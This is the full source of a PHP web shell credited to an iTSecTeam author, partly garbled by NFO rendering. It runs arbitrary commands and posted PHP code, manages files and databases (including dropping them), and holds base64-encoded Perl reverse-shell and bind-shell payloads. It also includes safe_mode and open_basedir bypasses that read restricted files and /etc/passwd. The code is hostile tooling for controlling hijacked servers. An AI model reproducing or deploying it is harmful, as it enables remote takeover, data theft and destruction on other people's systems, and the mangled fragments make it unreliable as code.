style="margin-top: 0pt; margin-bottom: 0pt" align="center">>
style="font-size: 9pt">Coded by Amin Shokohi (Pejvak)>
target="_blank>iTSecTeam.com</tbody></html>';
$deny=$head." Oh My God! Permission Denied".$end;
if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
if(is_readable($_GET['address'].$_GET['filename'])){
$opedit=fopen($_GET['address'].$_GET['filename'],"r");
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit);
echo $head.$formp.$nowaddress.'File Name : '.$_GET['address'].$_GET['filename'].'< >>
r><textarea rows="19" name="fedit" cols="87">'.htmlspecialchars("$data", ENT_QUOTES).'</textarea>>
value="'.$_GET['filename'].'" name=namefe></form>'.$end;exit;
}else{echo $deny;exit;}}
function sizee($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}
if($_GET['do']=="rename"){
echo $head.$formp.$nowaddress.'>
type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To >
type=submit value=" Save "></form>'.$end;exit;
}
if ($_REQUEST['cdirname']){
if(is_writable($_REQUEST['address'])){
mkdir($_REQUEST['address'].$slash.$_REQUEST['cdirname'],"0777");}else{echo $deny;exit;}}
function bcn($ipbc,$pbc){
$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
$opbc=fopen("bcc.pl","w");
fwrite($opbc,base64_decode($bcperl));
fclose($opbc);
system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions >>
Or Safe Mode");
}
function wbp($wb){
$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
$opwb=fopen("wbp.pl","w");
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe >>
Mode");
}
function lbp($wb){
$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
$oplb=fopen("lbp.pl","w");
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe >>
Mode");
}
if($_REQUEST['portbw']){
wbp($_REQUEST['portbw']);
}if($_REQUEST['portbl']){
lbp($_REQUEST['portbl']);
}
if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
}
if($_REQUEST['do']=="bc"){
echo $head.$formp."Usage : Run Netcat In Your Machin And Execute This Command( Disable >>
Firewall !!! )<hr><<<<<< Back Connect >>>>>>Ip Address : >
value=".$_SERVER['REMOTE_ADDR'] ."> Port : >
value=Connect></form>".$formp."Usage : Run Netcat In Your Machin And Execute This Command( >>
Disable Firewall !!! )<hr><<<<<< Windows Bind Port >>>>>>Port : >
name=portbw value=5555></form>".$formp."Usage >>
: Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<hr><<<<<< >>
Linux Bind Port >>>>>>Port : >>
/form>".$end;exit;
}
if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
if(is_writable($_REQUEST['cpyto'])){
copy($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto']);
}else{echo $deny;exit;}}
if($_REQUEST['cfilename']){
echo $head.$formp.$nowaddress.'Create File<textarea rows="19" >>
name="nf4cs" cols="87"></textarea>>
type=submit value=" Create "></form>'.$end;exit;
}
if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
if(is_writable($_REQUEST['address'])){
$ofile4c=fopen($_REQUEST['address'].$slash.$_REQUEST['nf4c'],"w");
fwrite($ofile4c,$_REQUEST['nf4cs']);
fclose($ofile4c);
}else{echo $deny;exit;}}
function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && >>
!empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR']; >>
query=$_REQUEST['querY'];
$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
$_SESSION=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION=$_REQUEST['p >>
sS'];$_SESSION=$_REQUEST['useR'];
}
if (isset ($_GET)){
$getdb=$_GET;
$_SESSION[db]=$getdb;
$query="SHOW TABLES";
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
}
elseif (isset ($_GET)){
$tbl=$_GET;
$_SESSION[tbl]=$tbl;
$query="SELECT * FROM `$tbl`";
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
}
elseif (isset ($_GET[drop_db])){
$getdb=$_GET[drop_db];
$_SESSION[db]=$getdb;
$query="DROP DATABASE `$getdb`";
querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,'',$query);
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,'','SHOW DATABASES');
}
elseif (isset ($_GET[drop_tbl])){
$getbl=$_GET[drop_tbl];
$query="DROP TABLE `$getbl`";
querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],'SHOW TABLES');
}
elseif (isset ($_GET[drop_row])){
$getrow=$_GET[drop_row];
$getclm=$_GET[clm];
$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
$tbl=$_SESSION[tbl];
querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],$query);
$res=querY($_SESSION[type],$_SESSION,$_SESSION,$_SESSION,$_SESSION[db],"SELECT * >>
FROM `$tbl`");
}
else
$res=querY($type,$server,$user,$pass,$db,$query);
if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode('[+][+][+]',$res);
$trow=explode('[-][-][-]',$title[1]);
$row=explode('|+|+|+|+|+|',$title[0]);
$data=array();
$field=$trow[count($trow)-2];
if (strstr($trow[0],'Database')!='')
$obj='db';
elseif (substr($trow[0],0,6)=='Tables')
$obj='tbl';
else
$obj='row';
$i=0;
foreach ($row as $a){
if($a!='')
$data[$i++]=explode('|-|-|-|-|-|',$a);
}
echo ">
er-collapse: collapse'>";
foreach ($trow as $ti)
echo "$ti";
echo "";
$j=0;
while ($data[$j]){
echo "";
foreach ($data[$j++] as $dr){
echo "";
if($obj!='row') echo "";
echo $dr;
if($obj!='row') echo "";
echo "";
}
echo "<a href='$_SERVER?do=db&drop_$obj=$dr";
if($obj=='row')
echo "&clm=$field";
echo "'>Drop";
}
echo "";
}
if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
echo "<form name=client method='POST' action='$_SERVER?do=db'>>
width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'>>
width='400' colspan='2' bgcolor='#F2F2F2'>>
color='#433934'>Connect to Database>
face='Arial' size='2'>DB Type:<option >>
valut=MySQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MySQL')echo 'selected';
echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MSSQL')echo 'selected';
echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
if ($_REQUEST['typE']=='Oracle')echo 'selected';
echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='DB2')echo 'selected';
echo ">IBM DB2</option>>
size='2'>Server Address:<input type=text value='";
if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
echo "' name=serveR size=35>>
size='2'>Username:<input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
echo "' size=35>Password >>
<input type=text value='";
if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
echo "' name=pasS size=35>>
r'>Submit a Query>
width='150' bgcolor='#EAEAEA'>DB Name:>
bgcolor='#EAEAEA'><input type=text value='";
if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
echo "' name=dB size=35>>
size='2'>Query:<textarea name=querY rows=5 cols=27>";
if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
echo "</textarea>$hcwd>
type=submit value='Submit' style='float: right'></form>$et";
}
function querY($type,$host,$user,$pass,$db='',$query){
$res='';
switch($type){
case 'MySQL':
if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);
if($link){
if(!empty($db))mysql_select_db($db,$link);
$result=mysql_query($query,$link);
if ($result!=1){
while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mysql_num_fields($result);$i++)
$res.=mysql_field_name($result,$i).'[-][-][-]';
}
mysql_close($link);
return $res;
}
break;
case 'MSSQL':
if(!function_exists('mssql_connect'))return 0;
$link=mssql_connect($host,$user,$pass);
if($link){
if(!empty($db))mssql_select_db($db,$link);
$result=mssql_query($query,$link);
while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mssql_num_fields($result);$i++)
$res.=mssql_field_name($result,$i).'[-][-][-]';
mssql_close($link);
return $res;
}
break;
case 'Oracle':
if(!function_exists('ocilogon'))return 0;
$link=ocilogon($user,$pass,$db);
if($link){
$stm=ociparse($link,$query);
ociexecute($stm,OCI_DEFAULT);
while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).' >>
+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<oci_num_fields($stm);$i++)
$res.=oci_field_name($stm,$i).'[-][-][-]';
return $res;
}
break;
case 'PostgreSQL':
if(!function_exists('pg_connect'))return 0;
$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
if($link){
$result=pg_query($link,$query);
while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<pg_num_fields($result);$i++)
$res.=pg_field_name($result,$i).'[-][-][-]';
pg_close($link);
return $res;
}
break;
case 'DB2':
if(!function_exists('db2_connect'))return 0;
$link=db2_connect($db,$user,$pass);
if($link){
$result=db2_exec($link,$query);
while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<db2_num_fields($result);$i++)
$res.=db2_field_name($result,$i).'[-][-][-]';
db2_close($link);
return $res;
}
break;
}
return 0;
}
function bywsym($file){
if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
if(!is_writable("."))
die("not writable directory");
$level=0;
for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}
while(1<$as--) chdir("..");
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}}
$as++;
while($as--)
chdir("..");
@rmdir("fakesymlink");
@unlink("fakesymlink");
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
else $num++;
@unlink("fakesymlink");
mkdir("fakesymlink");
}
function bypcu($file){
$level=0;
if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
echo ' <textarea rows="40" cols="120">';
if(FALSE==curl_exec($ch))
die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
echo ' </textarea> ';
curl_close($ch);
}
if ($_REQUEST['bypcu']){
bypcu($_REQUEST['bypcu']);
}
if($_REQUEST['do']=="bypasscmd"){
if($_POST['bycw']){
echo $_POST['bycw'];
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
$stdout = $exec->StdOut();
$stcom = $stdout->ReadAll();}
echo $head.'<textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){pass >>
hru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr>Bypass Safe_Mode And Disable_Functions >>
In Windows Server>
cellpadding="5">>
10pt; font-weight:700">'.$formp.'Command >
width="750"></form>Bypass >>
Safe_Mode Windows Server>
id="table4" cellpadding="5">>
style="font-size: 10pt; font-weight:700">'.$formp.'Command >
name=byws size=50>< >>
form>'.$end;exit;;
}
if($_REQUEST['do']=="bypassdir"){
if($_POST['byoc']){
if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
}else{$bopens="Can Not Bypass This";}
}
if($_POST['byfc']){
curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
$debfc=curl_exec($ch);
}
if($_POST['byetc']){
for($bye=0;$bye<40000;$bye++){ //cat /etc/passwd
$sbep =$sbep. posix_getpwuid($bye);
}}
if($_POST['byfc9']){
echo "not sucsfull";
}
if($_REQUEST['bysyml']){
$file=$_REQUEST['bysyml'];
bywsym($file);
}
echo $head.'<textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){pass >>
hru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} >>
if(isset($debfc)){var_dump($debfc);} echo $bopens.'</textarea><hr>Bypass Safe_Mode And >>
Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2>
style="border-collapse: collapse" id="table4" cellpadding="5">'.$f >>
rmp.'>
font-weight:700">Address File >
type=submit value ="read"></form><hr>Bypass Open_basedir And Read File With Bug Curl >>
Worked In PHP 4.4.2 and 5.1.4>
id="table4" cellpadding="5">>
style="font-size: 10pt; font-weight:700">'.$formp.'Address File >
name=byfc size=50>< >>
form><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... >>
5.2.9>
width="200" align="right" valign="top"> >>
.$formp.'Address File >
="eXecute"></form><hr>Bypass >>
/Etc/Passwd'.$formp.'>
value="lol"></form><hr>Bypass With ini_restore'.$formp.'>
type=submit value ="Read File">>
value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink>
border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">>
width="200" align="right" valign="top"> >>
.$formp.'>
File"></f >>
rm><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... >>
5.2.9>
width="200" align="right" valign="top"> >>
.$formp.'>
File"></form>'.$end;exit;;
}
if($_POST['nameren'] && $_POST['addressren']){
if(is_writable($_REQUEST['addressren'])){
rename($_POST['addressren'],$_POST['nameren']);}else{echo $deny;exit;}
}
if($_GET['do']=="delete"){
if ($_GET['type']=="dir"){
if(is_writable($_REQUEST['address'])){
$dir=$_GET['address'].$_GET['filename'];
deleteDirectory($dir);
}elseif($_GET['type']=="file"){
if(is_writable($_GET['address'].$_GET['filename'])){
unlink($_GET['address'].$_GET['filename']);}else{echo $deny;exit;}
}
}}
if($_POST['fedit'] && $_POST['namefe']){
if(is_writable($_REQUEST['address'])){
$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
echo bazam;
fwrite($opensave,$_POST['fedit']);
fclose($opensave);}else{echo $deny;exit;}
}
if ($_POST['evalsource']){
eval($_POST['evalsource']);
}
if($_GET['do']=="eval"){
echo $head.$formp.$nowaddress.'<textarea rows="19" name="evalsource" cols="87"></t >>
xtarea></form>'.$end;exit;
}
if($_GET['do']=="info"){
if(ini_get('safe_mode')){
$safe_modes="On";
}else{
$safe_modes="Off";
}
if(ini_get('disable_functions')){
$disablef=ini_get('disable_functions');
}else{
$disablef="All Functions Enable";
}
if(ini_get('register_globals')){
$registerg="Enable";
}else{
$registerg="disable";
}
if(extension_loaded('curl')){
$curls="Enable";
}else{
$curls="disable";
}
if(@function_exists('mysql_connect')){
$db_on = "Mysql : On";
};
if(@function_exists('mssql_connect')){
$db_on = "Mssql : On";
};
if(@function_exists('pg_connect')){
$db_on = "PostgreSQL : On";
};if(@function_exists('ocilogon')){
$db_on = "Oracle : On";
};
echo $head."Operating System : ".php_uname()."Server Name : >>
".$_SERVER['HTTP_HOST']."Disable_Functions : ".$disablef."Safe_Mode : ".$safe_modes."Openbase_dir >>
: ".ini_get('openbase_dir')."Php Version : ".phpversion()."Free Space : ".sizee(disk_free_sp >>
ce("/"))."Total Space : ".sizee(disk_total_space("/"))."Register_Globals : ".$registerg."Curl >>
: ".$curls."Database ".$db_on."Server Name : ".$_SERVER['HTTP_HOST']."Admin Server : >>
".$_SERVER['SERVER_ADMIN'].$end;
exit;
}
if ($_GET['do']=="cmd"){
echo $head.'
<form method=get action="'.$me.'">
<textarea rows="19" name="S1" cols="87">';if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
echo $_GET['execmethod']($_GET['command']);}
if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
popen($_GET['command'],"r");}
echo'</textarea>
>
name=execmethod>
<option value="system">System</option> <option value="exec">Exec</option> <option value="passthr >>
">Passthru</option><option value="popen">popen</option>
</form>'.$end;exit;}
if($_GET['do']=="db"){
echo $head;sqlclienT();echo $end;
exit;
}
if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
$chmodnum2=$_REQUEST['chmodnow'];
chmod($_REQUEST['file2ch'],"0".$chmodnum2);
}
if($_GET['do']=="chmod"){
echo $head.$formg.$nowaddress."Chmod>
value='".$_REQUEST['address'].$_REQUEST['filename']."'> To >
type=submit value=Set></form>".$end;exit;
}
if($_GET['do']=="edit"){
if($_GET['filename']=="dir"){
if(is_readable($_GET['address'].$_GET['filew'])){
chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;}
}}
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
for($countback=0;$countback<count($addr1backk);$countback++){
$arraybacke[$countback]=$slash.$addr1backk[$countback];
$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
}
if ($slash=="\\"){
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
}else{
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."/".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
var_dump($backaddresss);
$backaddresss=str_replace("\\","/",$backaddresss);
}
function calc_dir_size($path)
{
$size = 0;
if ($handle = opendir($path))
{
while (false !== ($entry = readdir($handle)))
{
$current_path = $path . '/' . $entry;
if ($entry != '.' && $entry != '..' && !is_link($current_path))
{
if (is_file($current_path))
$size += filesize($current_path);
elseif (is_dir($current_path))
$size = calc_dir_size($current_path);
}
}
}
closedir($handle);
return $size;
}
if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
if($cwd==''){$cwd=getcwd();}$nowaddress='';
$ad=getcwd();
$hand=opendir("$ad");
while (false !== ($fileee = readdir($hand))) {
if ($fileee != "." && $fileee != "..") {
if (filetype($fileee)=="dir"){
$fil=$fil.'>
bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
>
style="font-size: 9pt">'.$ >>
ileee.'
'.date("y/m/d", >>
filectime($fileee)).'>
9pt">'.substr(sprintf('%o', >>
fileperms($cwd.$slash."$fileee")), -3).'>
face="Tahoma" style="font-size: 9pt">>
style="font-size: 9pt">Ren
>
e&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del'
;}
else{
$file=$file.'>
bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
>
style="font-size: 9pt">'.$fileee.'</ >>
pan>
'.sizee(filesize( >>
fileee)).'>
9pt">'.date("y/m/d", filectime($fileee)).'>
face="Tahoma" style="font-size: 9pt">>
>'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'>
width="30">>
ame='.$fileee.'">Edit>
9pt">Ren
>
e&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del'
;}
}
}
echo $head.'
>
dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
>
style="font-size: 9pt">Now Directory : '.$backaddresss.'>
ress='.$backaddresss.'">Back
'.$fil.$file.'
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formg.'Change Directory
>
border-bottom: 1px solid #808080">>
value="Go"></form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
Upload --->
>
border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
'.$ifupload.'</form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formp.'Chmod ----> File :
>
border-bottom: 1px solid #808080">
<form method=post action=/now2.php>>
name=chmode> Permission : >
Ok "></form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formp.'Create Dir ----> Dirctory Name
>
border-bottom: 1px solid #808080">
'.$nowaddress.' </form>
>
border-top-width: 1px; border-bottom: 1px solid #808080">
'.$formp.'Create File ----> Name File
>
border-bottom: 1px solid #808080">
'.$nowaddress.' >
type=submit value=" Create "></form>
'.$formp.'Copy ----> File :
To Directory >
=Copy></form>
<hr></tbody>
Coded by Amin Shokohi (Pejvak)>
.itsecteam.com" target="_blank">iTSecTeam.com</tbody></tabl >>
></html>';
This NFO File was rendered by NFOmation.net
